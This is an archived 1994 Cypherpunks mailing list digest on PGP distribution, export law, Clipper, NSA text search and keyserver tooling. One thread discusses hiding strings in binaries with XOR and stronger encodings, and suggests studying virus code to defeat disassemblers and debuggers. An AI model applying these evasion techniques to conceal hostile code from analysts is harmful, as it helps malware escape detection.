dxm.ernet.in) --==================================================================-- From rishab at dxm.ernet.in Mon Dec 19 13:23:20 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 19 Dec 94 13:23:20 PST Subject: The Economist follows my Electric Dreams! 
Message-ID: The December 12th episode of my column, Electric Dreams #40, discussed the relative success in text processing using statistical methods over conventional natural language processing. The latest issue of The Economist (Dec 17-24th) has this as its lead science story. I congratulate myself on having one over my favourite periodical! Of course my article was 500 words, so the larger Economist story was more detailed. While I mentioned technology developed by the US National Security Agency and Architext, The Economist referred to research undertaken at BT (formerly British Telecom) and Cornell University, especially the work on automated text-summarization programs. If you'd like a copy of my original article, please send a blank message to rishab at arbornet.org with "get dreams-40" (without the quotes) as the Subject: field. For an index, send "get index"; to automatically receive future episodes of this 5kbyte/week column, send "subscribe". Happy Christmas and New Year! Rishab ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Mon Dec 19 13:29:58 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 19 Dec 94 13:29:58 PST Subject: NSA's text search algorithm Message-ID: "Ian Farquhar" : > I always imagined that the development of [NSA's text scanning] > algorithm itself predated email, and started back with cable and > telex traffic. Stat text scanning is ancient, but has probably not been used on the scale and efficiency that the NSA would require for net traffic. > > Earlier this year, the agency began soliciting collaborations from > > business to develop commercial applications of their technique. 
>
> Has anyone got any further information about how this algorithm works?
> It sounds like Rishab has somewhat better info than was publicly
> available months ago when we last discussed this particular NSA
> "technology transfer".

Actually my 'info' about NSA's thing was mainly deduction put together with
some (limited) specs on Architext (http://www.atext.com graham at atext.com).
If you read NSA's note carefully, you easily rule out NLP ("independent
of...language") and sophisticated neural nets ("very fast").

The Economist story I mentioned in my last post (on the fact that I beat them
to the story!) goes into some detail on BT and Cornell's programs that
summarize textual matter. These are apparently successful (included is a
pretty good example of a computer-generated summary of the article), but also
quite different from NSA's.

BT uses basic NLP to get past articles, conjunctions etc (making it
language-dependent), and stems (removes -ing, -ed, -s etc, unlike NSA which
denies stemming, dictionaries etc; obviously language-dependent), before
creating a statistical table of word frequencies which are used to determine
the subject of a sentence or the similarities between texts.

Cornell can search "gigabytes of data ... in a few seconds [for] a subject"
or similarity to an example text. It can figure out which sentences are
'important' (by comparing frequency tables).

I suspect NSA's is much more pattern-oriented, as its USP is document
clustering; maybe it uses some NN at some level. Of course you don't really
need to know grammar to filter out articles and pronouns; you could do that
statistically too.
Rishab ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From warrior at infinet.com Mon Dec 19 13:41:46 1994 From: warrior at infinet.com (David M. Harvey) Date: Mon, 19 Dec 94 13:41:46 PST Subject: Pgp in Europe In-Reply-To: <1DB8505345B@bebop.tt.luth.se> Message-ID: Karl, Try ftp://ftp.uu.net/pub/security/virus/crypt/pgp ftp://ftp.win.tue.nl/pub/security/virus/crypt/pgg or ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp The last is the best but only allows five users, but the first two are mirrors of the last and are fast. It is the most complete that I have seen, go for it. Dave On Mon, 19 Dec 1994, Karl Lundkvist wrote: > Does anyone know a way to get Pgp 2.6.2 by ftp, mail or something in > Europe? > Karl Lundkvist ___ /\ PGP the Cutting Edge of Privacy. /vvvvvvvvvvvv \-----------------------------------\ | WARRIOR ( | PGP Key Id 0XC554E447D > Magnus Frater Videt Tu `^^^^^^^^^^^^ /===================================/ \/ Finger for PGP 2.6.2 public Key. PGP Fingerprint 15 99 09 6D 11 C8 7C E0 08 C7 E6 95 46 65 FE F0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | Dave M. 
Harvey warrior at infinet.com| | PO Box 151311 dharvey at freenet.columbus.oh.us| | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From sandfort at crl.com Mon Dec 19 14:03:16 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 19 Dec 94 14:03:16 PST Subject: Name that phone In-Reply-To: Message-ID: Hi Phil, (1) The PGP Un-clipper (PGP Clipper...Not) (2) Freeh-Free PGP S a n d y From mkj at october.ducktown.org Mon Dec 19 14:26:28 1994 From: mkj at october.ducktown.org (mkj at october.ducktown.org) Date: Mon, 19 Dec 94 14:26:28 PST Subject: freedom+diversity=noise Message-ID: <199412192215.RAA04833@october.ducktown.org> -----BEGIN PGP SIGNED MESSAGE----- This list appears to be going through some sort of crisis. Tim May has quit, others are threatening to quit, and the messages criticizing the list itself threaten to outnumber those on all other topics! Frankly, I don't get it. What's everybody so upset about? A few arguments, some bad manners? Can we afford to be so sensitive? Now, I admit I don't read every message posted here (who has the time?), but I read a fair sampling, and I haven't seen anything half as bad as what I face every day on the subway. At least on this list, nobody has ever pulled a weapon on me! Personally I don't understand why some people are so bothered by the noise here and elsewhere on the nets. Sticks and stones and all that, you know? But a number of people here have even suggested that the Cypherpunks list, at least in its present form, is near the end of its useful life. I would like to go on record as strongly DISagreeing with that suggestion. Sure, I wish we were making more progress faster, but I think we are doing better than many of us realize. The job is not an easy one, and in my experience, I have found that difficult jobs demand perseverance above all other virtues. 
However, it seems that every time a forum, list, newsgroup or whatever becomes too popular, it reaches a "critical mass" at which people start complaining that everything is ruined, and soon thereafter the forum splinters and/or switches to a moderated format. Thinking about the phenomenon, I came up with the following brilliant (ahem) generalization, which I humbly dub "mkj's law": FREEDOM + DIVERSITY = NOISE Where "noise" is defined as any behavior(s) which a significant portion of the group finds undesirable. The above law appears to apply not only to network forums, but equally well to other types of social groups. (Note for example that mkj's law is inextricably linked with the old amateur-radio principle, "One Man's Signal is Another Man's Noise".) Mkj's law has disturbing implications, in that "noise" (which is normally considered a Bad Thing) is shown to be an inevitable consequence of the combination of freedom and diversity (which are normally considered Good Things). Mkj's law also states that there are only two ways to reduce the noise in any group: (1) Crack down on freedom (impose controls on behavior, the job of police in the physical realm or moderators/censors in the informational realm); or (2) Crack down on diversity (usually by restricting group membership, or perhaps by other means such as strong charismatic leadership). Note that this "mkj's law" stuff is a first-draft, brand-new idea for me; I'm not taking a firm position, just soliciting comments. ObCrypto-Philosophy: Clearly, at the root of the Cypherpunks agenda -- or any pro-privacy agenda -- lies a presumption that freedom and diversity are Good Things, whereas "noise reducers" like censorship, prejudice, and intrusive law-enforcement are Bad Things. I share this presumption. 
But it might be an interesting exercise to ask: If we can't accept with good grace the current noise on the Cypherpunks list, how are we going to like real life in a global society where freedom and diversity have been greatly increased by "crypto-anarchy"? Will the "global village" fragment into isolationist cliques? Even sooner, will the Cypherpunks? --- mkj P.S. Since I don't recall posting my public key to this list before: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAi3q+mcAAAEEAOKHMopu6yj57rtwamGwh79bpxAzcbysIJ17PNc/D902WEHG m81FyrcjZaWgj2jX+JYPKqPrOmy72arHJjP5wkAFd2VG5p+WdQjkwXtObOoJ5qfd l+twaRqZVvl4gDiBoFrdrwVSGxXGqAMLOP3VvcQk3uH4y6GmdF11Wd4tm8clAAUR tC5NYWhhdG1hIEthbmUtSmVldmVzIDxta2pAb2N0b2Jlci5kdWNrdG93bi5vcmc+ =Eb3a - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvYFdl11Wd4tm8clAQH20AP9ESKpTtl3C926QDOzUZXISQLWDWY6hsxd 1i3g29cePDDfb29D4LweXp5GTJTpGwHE5saXpPuveFrsWUN8KUOBlJRG0g+Sj1JP ZR3QAb/hRlEJBoi7bgpZJQOijXdJIV2oevO5Q9CinRP56CEudCnAhi3xqX5dfMeL ikAwokXsB44= =Nl3X -----END PGP SIGNATURE----- From RGRIFFITH at sfasu.edu Mon Dec 19 14:28:45 1994 From: RGRIFFITH at sfasu.edu (RGRIFFITH at sfasu.edu) Date: Mon, 19 Dec 94 14:28:45 PST Subject: rehash of fbi v. weaver, or 'freeh is a jerk' Message-ID: <01HKTPF3HWNQ0043P5@TITAN.SFASU.EDU> It was announced (I think last week) that there would be no prosecution of the sniper who shot Vicki Weaver as she stood in the cabin door holding her baby. It's good to see an editorial like that in a major newspaper. >i happen to be on the road in tennessee, and read this editorial in the >knoxville new-sentinel. i don't remember seeing anything about this when it >happened...but since freeh and the fbi seem to be disliked these days, >here's some more fodder for the fire. > >-avi > >ps - hopefully this isn't a repeat, but being on the road, i'm mail-delayed >at least 24 hours. 
>
>The Knoxville News-Sentinel, Dec 16, 1994, pA16
>
>DISTURBING SILENCE
>-FBI chief taking his time acting on report about Idaho shootout
>
>All eyes are on Louis Freeh, director of the Federal Bureau of
>Investigation, as he ponders disciplinary action in the infamous shootout at
>Ruby Ridge, Idaho, in 1992. This being the end of 1994, one starts to wonder
>what is taking the director so long.
>
>Excessive use of force by the FBI is no trivial matter. Citizens might
>gather from the Idaho case that the government claims special license to
>abuse the rights of loners with extremist views.
>

From ianf at sydney.sgi.com Mon Dec 19 14:30:47 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Mon, 19 Dec 94 14:30:47 PST
Subject: Pgp in Europe
In-Reply-To: <199412192056.PAA25273@bb.hks.net>
Message-ID: <9412200917.ZM12354@wiley.sydney.sgi.com>

On Dec 19, 3:56pm, L. McCarthy wrote:
> The U.S. govt. doesn't want you to get PGP from the U.S., but you are
> (presumably) not a U.S. resident or citizen, so U.S. laws don't apply to you.
> As long as _Swedish_ law doesn't bar you from importing strong cryptography
> into Sweden, you can grab PGP from wherever you like.

As has been discussed many times before, it is not that clear cut. Legal
opinion I have gotten said that the US government would almost certainly
consider its laws violated if a "foreign national" fetched a piece of ITAR
controlled software from a US site, although its ability to prosecute would
be limited _until_that_individual_entered_US_territory_. That's a big gotcha,
folks. Let's not forget Phil Z's recent experience with US customs.
The legal opinion I have gotten also suggested that traffic passing through
the US (but not having a source or destination with that legal jurisdiction)
is a very grey legal area, and even might depend on whether the signal
travelled via satellite or cable (there might even be loopholes if it went
over US territory - via a satellite link - rather than travelling through it
via landlines.) Non-deterministic routing also would make it difficult to
prosecute, although the fact that they are investigating Phil for writing the
software makes me wonder just how much reality is involved in their decision
to proceed with legal action.

I personally would be extremely cautious about fetching anything from another
country unless that country specifically allowed export of crypto software.
Fortunately, most European countries do, and there are several good crypto
sites there.

Ian.

#include "I speak only for myself."

From habs at panix.com Mon Dec 19 14:31:15 1994
From: habs at panix.com (Harry S. Hawk)
Date: Mon, 19 Dec 94 14:31:15 PST
Subject: test1
Message-ID: <199412192230.AA14796@panix.com>

Test.. Please ignore..

/hawk

--
Harry S. Hawk              habs at panix.com
Product Marketing Manager
PowerMail, Inc.            Producers of MailWeir(tm) & PowerServ(tm)

From habs at cmyk.warwick.com Mon Dec 19 14:31:27 1994
From: habs at cmyk.warwick.com (Harry S. Hawk)
Date: Mon, 19 Dec 94 14:31:27 PST
Subject: test2
Message-ID: <9412200130.AA08135@cmyk.warwick.com>

Test. Please ignore

From andrew_loewenstern at il.us.swissbank.com Mon Dec 19 14:42:13 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Mon, 19 Dec 94 14:42:13 PST
Subject: c'punks top 5
Message-ID: <9412192242.AA02002@ch1d157nwk>

What, IMHO, are the top 5 most important things the cypherpunks should be
concentrating on? No doubt everyone else has their own ideas of what the
"cypherpunks top 5" (or top 10) is, so please tell us your suggestions.

1. anonymous http proxy servers ("re-webbers")
2.
PGP compatible crypto library 3. reply-able remailers that are secure and easier for the recipient 4. better remailer security (dc-nets) 5. socket-based keyserver interface for real-time automagic key fetches andrew From perry at imsi.com Mon Dec 19 14:48:23 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 19 Dec 94 14:48:23 PST Subject: freedom+diversity=noise In-Reply-To: <199412192215.RAA04833@october.ducktown.org> Message-ID: <9412192247.AA09153@snark.imsi.com> mkj at october.ducktown.org says: > This list appears to be going through some sort of crisis. Is it? I don't see one... .pm From jamesd at netcom.com Mon Dec 19 14:50:10 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 19 Dec 94 14:50:10 PST Subject: (fwd) Newt says Clipper Chip is Dead Message-ID: <199412192244.OAA04567@netcom8.netcom.com> Xref: netcom.com alt.culture.usenet:6563 alt.rave:37968 Newsgroups: alt.culture.usenet,alt.rave Path: netcom.com!ix.netcom.com!howland.reston.ans.net!usc!bloom-beacon.mit.edu!crl.dec.com!crl.dec.com!pa.dec.com!mtshasta.snowcrest.net!ken From: ken at snowcrest.net ("Ken Stuart") Message-ID: <82739.ken at mtshasta.snowcrest.net> Reply-To: ken at snowcrest.net Subject: Newt says Clipper Chip is Dead Date: Tue, 13 Dec 94 20:09:25 PDT X-Received: by usenet.pa.dec.com; id AA29312; Tue, 13 Dec 94 20:15:43 -0800 X-Received: by pobox1.pa.dec.com; id AA20213; Tue, 13 Dec 94 20:15:37 -0800 X-Received: from mtshasta.snowcrest.net by inet-gw-1.pa.dec.com (5.65/10Aug94) id AA16575; Tue, 13 Dec 94 20:14:24 -0800 X-Received: from [204.94.225.49] (sl1.mtshasta.snowcrest.net [204.94.225.49]) by mtshasta.snowcrest.net (8.6.5/8.6.5) with SMTP id UAA15046; Tue, 13 Dec 1994 20:13:23 -0800 X-Minuet-Version: Minuet1.0_Beta_16 X-Popmail-Charset: English X-To: alt.rave.usenet at decwrl.dec.com, alt.culture.usenet.usenet at decwrl.dec.com Lines: 16 Hello, On his weekly call-in TV show on National Empowerment Television tonight, Newt received a call asking about his 
opinion on the Clipper Chip, and he replied that it was a moot point, in that the Clipper chip concept was designed for a condition that no longer exists. So, paranoiacs, lighten up! :-) - respect to all, Ken ken at snowcrest.net (primary address) (if no answer, try ken.stuart at tigerteam.org ) -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From erich at CSUA.Berkeley.EDU Mon Dec 19 15:11:36 1994 From: erich at CSUA.Berkeley.EDU (Erich von Hollander) Date: Mon, 19 Dec 94 15:11:36 PST Subject: the idiot spamming people who post to alt.2600 through my remailer Message-ID: <199412192309.PAA06147@soda.CSUA.Berkeley.EDU> :: Post-To: alt.2600 has been squished. e From ianf at sydney.sgi.com Mon Dec 19 15:12:57 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Mon, 19 Dec 94 15:12:57 PST Subject: NSA's text search algorithm In-Reply-To: Message-ID: <9412200958.ZM12538@wiley.sydney.sgi.com> On Dec 20, 2:33am, rishab at dxm.ernet.in wrote: > Subject: NSA's text search algorithm > "Ian Farquhar" : > > I always imagined that the development of [NSA's text scanning] > > algorithm itself predated email, and started back with cable and > > telex traffic. > > Stat text scanning is ancient, but has probably not been used on the scale > and efficiency that the NSA would require for net traffic. > > > > Earlier this year, the agency began soliciting collaborations from > > > business to develop commercial applications of their technique. > > > > Has anyone got any further information about how this algorithm works? > > It sounds like Rishab has somewhat better info than was publicly > If you read NSA's note carefully, you easily rule out > NLP ("independent of...language") and sophisticated neural nets ("very fast"). 
You can rule out both of them on the grounds that the original release
claimed that it was amenable to hardware implementation. I speculated some
clever form of CAM plus stats engine.

Ian.

From adam at bwh.harvard.edu Mon Dec 19 15:30:54 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 19 Dec 94 15:30:54 PST
Subject: Doomsaying, development, and deployment
In-Reply-To:
Message-ID: <199412192026.PAA00306@spl>

Why use the PGP libs? Would it be easier to use swIPe as an engine for
encryption? If you do use swIPe, name the package link IP encryption.

Adam

Steve wrote:

| > | How about starting a todo list so we can reach a consensus on a
| > | prioritized list of goals. This may help us come up with projects
| > | we can work together on. I'm itching to do some coding...
| >
| > Some projects worth doing:
| >
| > a link encryptor
|
| If someone would recommend the best version of the pgp libs,
| I'll think about adding it to plug-gw (from TIS). That would
| provide a ready made transparent shell for connecting
| systems.

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From wcs at anchor.ho.att.com Mon Dec 19 15:33:26 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 19 Dec 94 15:33:26 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID: <9412192248.AA18275@anchor.ho.att.com>

Oh, get real, Lucky! My mail reader here is neither inadequate nor
(particularly) buggy - it's good old "Mail", and when somebody posts MIME
mail, it quite accurately shows me the real ASCII the mail is made of - I
wish my other mail reader would do that. (It's Microsoft Mail, a closed,
buggy, really appalling system that chokes on messages with more than 64K of
non-attachment message body, and chokes badly on >132K.) If there were a
convenient MIME viewer to pop in as my PAGER, I might have mail use it rather
than less -sc, my current preference.
But meanwhile, a MIME is a terrible thing to waste.....

From adam at bwh.harvard.edu Mon Dec 19 15:37:35 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 19 Dec 94 15:37:35 PST
Subject: c'punks top 5
In-Reply-To: <9412192242.AA02002@ch1d157nwk>
Message-ID: <199412192332.SAA00946@spl.bwh.harvard.edu>

Andrew wrote:

| 1. anonymous http proxy servers ("re-webbers")
| 2. PGP compatible crypto library

What's wrong with PGPtools? (A lack of documentation. Been a while since I
looked, but I think it lacked a high level interface. The low level stuff is
great, but on the mac, I can send an Appleevent "Encrypt *file recipient"
and, some extended period later, get a response.

| 3. reply-able remailers that are secure and easier for the recipient
| 4. better remailer security (dc-nets)
| 5. socket-based keyserver interface for real-time automagic key
| fetches

Who needs real time? The servers are often bogged down and don't respond in
real time anyway. The following procmail works fine. There's also a short
shell script at the end.

# prevent bounces, add keys to ring.
:0
* From bal at swissnet.ai.mit.edu
{
        :0
        * >10000
        /dev/null

        :0
        *Subject:.*no keys match
        /dev/null

        :0E
        | pgp +batchmode -fka
}

# auto key retrieval
# I have an elm alias, pgp, points to a keyserver
# The logfile gets unset briefly to keep the elm lines out of my
# logfile.
:0BW
* -----BEGIN PGP
*!^FROM_DAEMON
KEYID=|/usr3/adam/bin/sender_unknown
LOGFILE=
:0ac
|elm -s"mget $KEYID" pgp
LOGFILE=$MAILDIR/.procmail.log

/usr3/adam/bin/sender_unknown:

#!/bin/sh
# unknown returns a keyid, exits 1 if the key is known
# $output is to get the exit status. Otherwise, this would be a one liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$?
if [ $EV -eq 0 ]; then
        echo $OUTPUT | awk '{print $6}'
fi
exit $EV

--
"It is seldom that liberty of any kind is lost all at once."
-Hume From wcs at anchor.ho.att.com Mon Dec 19 15:42:05 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 19 Dec 94 15:42:05 PST Subject: properties of FV Message-ID: <9412192315.AA18562@anchor.ho.att.com> In the www-buyinfo discussion on crypto, > From research!nsb.fv.com!nsb Sat Dec 17 09:36:40 1994 >Eric > "If and When" is Yes and Today. Anybody who can autosign their > > The risk analysis is absolutely true. However, I have the impression > you missed the phrase "deployed widely enough to have penetrated a > meaningful portion of our market". I suspect that the cypherbunks and > www-buyinfo communities are not the best place to get a feel for the > extent to which crypto is widely deployed. Pick some random other list > or newsgroup, however, and I'll be surprised if you find 1% market > penetration for crypto. Obviously, from reading Cypherpunks you'd get the idea that everybody has PGP and all but a few old fogies have MIME :-) However, one of the reasons that few people actually are using PGP signatures on all their messages is that there's no real need - most of us realistically aren't trying to overthrow our governments, except through obsolescence and ridicule, and there isn't much problem with forging postings on the net. On the other hand, if my credit card were involved, I'd certainly be happy to start signing all my fv payment confirmations, especially if there were a convenient tool for doing so that got distributed free.... bILL From norm at netcom.com Mon Dec 19 16:11:11 1994 From: norm at netcom.com (Norman Hardy) Date: Mon, 19 Dec 94 16:11:11 PST Subject: IPSP Message-ID: At 11:51 AM 12/19/94, Perry E. Metzger wrote: .... >I'll send sections of my draft if anyone wants to hear more on the >topic. .... I would very much like to see the IPSP stuff. I have searched several MB of new and old mail and found no references to a source. 
Thanks

From andrew_loewenstern at il.us.swissbank.com Mon Dec 19 16:24:01 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Mon, 19 Dec 94 16:24:01 PST
Subject: c'punks top 5
Message-ID: <9412200024.AA02051@ch1d157nwk>

Adam Shostack writes:
> What's wrong with PGPtools? (A lack of documentation. Been
> a while since I looked, but I think it lacked a high level
> interface. The low level stuff is great, but on the mac, I can
> send an Appleevent "Encrypt *file recipient" and, some extended
> period later, get a response.

It has been a while since I looked too, does it work with the 'new' format
messages generated by MIT pgp? Does anyone actually USE pgptools for any
available applications? As far as I know, nobody uses it. If nobody uses
PGPtools, then what is the reason? Either nobody really wants a PGP library
(which isn't true judging from the inquiries on cypherpunks), or something is
wrong with PGPTools. Is it the documentation like you said? Maybe some of us
should pick up where pr0duct cypher left off and enhance PGPTools.

This brings me to another point: Isn't the file format for PGP supposed to
change (I think I remember Colin telling me this quite a long time ago)? If
it is, should we bother with PGPtools? What really is the status of PGP 3.0?
Assuming the file-format has changed, shouldn't it have been decided by now?
If PGP 3.0 is being written on top of a portable generic crypto-library,
don't you think this, the foundation of the new PGP, would be ready (after a
year+ of working on it and rumors from developers of PGP 3.0 being out in 6
months?). There was a quick thread on this last week and not a peep was
heard... I really wish somebody who had a clue would fill us in on where PGP
3.0 really stands. I have the suspicion that it is not nearly as far as we
would like to think. If this is the case we should probably get cracking on
PGPtools.

> | 5.
socket-based keyserver interface for real-time automagic key
> | fetches
>
> Who needs real time? The servers are often bogged down
> and don't respond in real time anyway. The following
> procmail works fine. There's also a short shell script at the end.

When I am checking a signature, I want to be able to check that signature right now! By the time an e-mail request gets back, I'm a 100 articles down the line and not interested in checking that signature anymore. For personal mail, or REALLY important news articles, I am willing to wait, of course.

The finger-for-keys server at Illuminati Online is an example of real-time key fetching (although last I tried it didn't work... either it's no longer there, or it has moved from wasabi.io.com and I don't know the generic hostname for their pgp-keyserver), but to access it programmatically would require some parsing and such... A keyserver that watched a TCP port and had a very simple protocol (maybe Simple Key Transfer Protocol - SKTP) for requesting keys, would be keen.

Maybe auto-key fetching isn't something we need to concentrate on... I was just throwing out some ideas...

andrew

From jonathon.fletcher at psych.stir.ac.uk Mon Dec 19 16:28:54 1994
From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher)
Date: Mon, 19 Dec 94 16:28:54 PST
Subject: Hiding strings in objects code
Message-ID: <9412200027.AA18993@oss.stir.ac.uk>

I'm looking for a way of concealing the text strings in an object file so that they can't be seen. I'd like to use something a little more complicated than rot13 :-), but something that's freely usable for non-profit use.

Any suggestions as to which I should use ?

-Jon
--
Jonathon Fletcher, j.fletcher at stirling.ac.uk

From jonathon.fletcher at psych.stir.ac.uk Mon Dec 19 16:45:32 1994
From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher)
Date: Mon, 19 Dec 94 16:45:32 PST
Subject: c'punks top 5
Message-ID: <9412200043.AA19009@oss.stir.ac.uk>

>
> 1.
anonymous http proxy servers ("re-webbers")
>

What is wanted/meant for these ?

-Jon
--
Jonathon Fletcher, j.fletcher at stirling.ac.uk

From jonathon.fletcher at psych.stir.ac.uk Mon Dec 19 16:48:55 1994
From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher)
Date: Mon, 19 Dec 94 16:48:55 PST
Subject: Physical location of a machine
Message-ID: <9412200047.AA19020@oss.stir.ac.uk>

>From David Harvey's list of places holding pgp outside the us:

ftp://ftp.uu.net/pub/security/virus/crypt/pgp

where, physically, is this machine (country).

-Jon
--
Jonathon Fletcher, j.fletcher at stirling.ac.uk

From warlord at MIT.EDU Mon Dec 19 16:55:37 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 19 Dec 94 16:55:37 PST
Subject: Hiding strings in objects code
In-Reply-To: <9412200027.AA18993@oss.stir.ac.uk>
Message-ID: <9412200055.AA06815@steve-dallas.MIT.EDU>

> I'm looking for a way of concealing the text strings in an object file
> so that they can't be seen. I'd like to use something a little more
> complicated than rot13 :-), but something that's freely usable for
> non-profit use.

I assume you mean so that running "strings" on the binary will not lead you to anything, right? You can use an XOR with some weird value to hide the strings. Just make sure the value you use will, for example, set the high bit on the string bytes...

It is a cheap, free way to hide strings. It is, by no means, secure.

-derek

From rogaski at phobos.lib.iup.edu Mon Dec 19 16:55:50 1994
From: rogaski at phobos.lib.iup.edu (Mark Rogaski)
Date: Mon, 19 Dec 94 16:55:50 PST
Subject: Name that phone
Message-ID: <199412200055.TAA18044@phobos.lib.iup.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Why not a little recursion?

PGP --> Phones Get PGP

:)

- -----
Mark Rogaski a.k.a. Doc            "I used to think that my brain was the
rogaski at phobos.lib.iup.edu      best part of my body ... but then I
http://www.lib.iup.edu/~rogaski/   remembered who was telling me this."
100,000 lemmings can't be wrong!
- Emo Phillips
>>>>>finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1<<<<<
Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From jef at ee.lbl.gov Mon Dec 19 17:33:22 1994
From: jef at ee.lbl.gov (Jef Poskanzer)
Date: Mon, 19 Dec 94 17:33:22 PST
Subject: Hiding strings in objects code
Message-ID: <199412200132.RAA12865@hot.ee.lbl.gov>

>I assume you mean so that running "strings" on the binary will not
>lead you to anything, right? You can use an XOR with some weird value
>to hide the strings. Just make sure the value you use will, for
>example, set the high bit on the string bytes...
>
>It is a cheap, free way to hide strings. It is, by no means, secure.

When rtm used this technique in his worm I'm sure a lot of people, such as myself, spent the five minutes necessary to hack up a program that tries XORing the input with all 256 possible bytes. I had the program pipe the output of each try through strings and wc, to check whether any significant text was uncovered. Only 0x00 and the single now-forgotten value he used got hits - no second XOR value.

Anyway the point is it's *really* by no means secure, and you can do much better with a few minutes thought. Set up a basic framework using a Makefile that takes a file of

    MNEMONIC "text string"

and runs it through an encoding program to produce a .h file of

    static char* text[] = {
    ...
    #define MNEMONIC 17
    "vb4hv7789sd",

Then in your actual program you just call

    decode(text[MNEMONIC]);

Given that simple framework you can experiment with lots of different encoding and decoding functions.
---
Jef

From alex at omaha.com Mon Dec 19 17:39:01 1994
From: alex at omaha.com (Alex Strasheim)
Date: Mon, 19 Dec 94 17:39:01 PST
Subject: hiding strings in binaries
Message-ID: <199412200139.TAA02213@omaha.omaha.com>

-----BEGIN PGP SIGNED MESSAGE-----

I didn't write this program and I don't know how it works. It was posted on the nyx freenet by kstern at nyx.cs.du.edu. When you compile and run it, it prints out the lyrics to "The Twelve Days of Christmas".

As you might imagine from looking at the code, strings doesn't find anything in it.

#include
main(t,_,a)
char *a;
{
return!0
Message-ID: <199412200211.SAA28060@mycroft.rand.org>

> Jef Poskanzer writes:
> When rtm used this technique in his worm I'm sure a lot of people,
> such as myself, spent the five minutes necessary to hack up a program
> that tries XORing the input with all 256 possible bytes. I had the
> program pipe the output of each try through strings and wc, to check
> whether any significant text was uncovered. Only 0x00 and the single
> now-forgotten value he used got hits - no second XOR value.

Yes, I did too -- it was 0x81. I think my message of worm passwords was the first to make it out, along with my Perl script to try out your own password file. Yes, Perl was already around.

What method you use in your program depends on your model of your opponent. If it's somebody only mildly interested, flipping the bits is fine. For a slightly higher level of anxiety, you could use Vigenere-like stuff -- XORing with a short key (8 bytes at a time with long longs if you're in gcc, for example), or use a longer key and restart now and then (interrupted key). For the next higher level, you might use DES and hide the key in your data, making them disassemble it. Next step... make your code obscure. After that... hardware.

You might want to study some virus code to see how they try to thwart disassemblers and debuggers.

YMMV.

Jim Gillogly
Mersday, 30 Foreyule S.R.
1994, 02:06

From jrochkin at cs.oberlin.edu Mon Dec 19 18:26:28 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 19 Dec 94 18:26:28 PST
Subject: (fwd) Newt says Clipper Chip is Dead
Message-ID:

At 5:44 PM 12/19/94, James A. Donald wrote:
>On his weekly call-in TV show on National Empowerment Television tonight,
>Newt received a call asking about his opinion on the Clipper Chip, and he
>replied that it was a moot point, in that the Clipper chip concept was
>designed for a condition that no longer exists.

Eh? What condition is that? I don't understand. What condition used to exist that required the deployment of the Clipper Chip, that no longer exists? What was he talking about?

From elton at sybase.com Mon Dec 19 18:30:42 1994
From: elton at sybase.com (Elton Wildermuth)
Date: Mon, 19 Dec 94 18:30:42 PST
Subject: hiding strings in binaries
Message-ID: <9412200231.AA04630@fnord.sybgate.sybase.com>

>I didn't write this program and I don't know how it works. It was posted
>on the nyx freenet by kstern at nyx.cs.du.edu. When you compile and run it,
>it prints out the lyrics to "The Twelve Days of Christmas".

I didn't write it either, but a friend asked how the hell it did that, so I hacked on it for a couple hours and now I _do_ know how it works: it's a substitution cipher just like rot-13, coupled with a selector to print phrases in a predetermined order.

This string:

>"!ek;dc i@bK'(q)-[w]*%n+r3#l,{}:\nuwloca-O;m .vpbks,fxntdCeghiry"

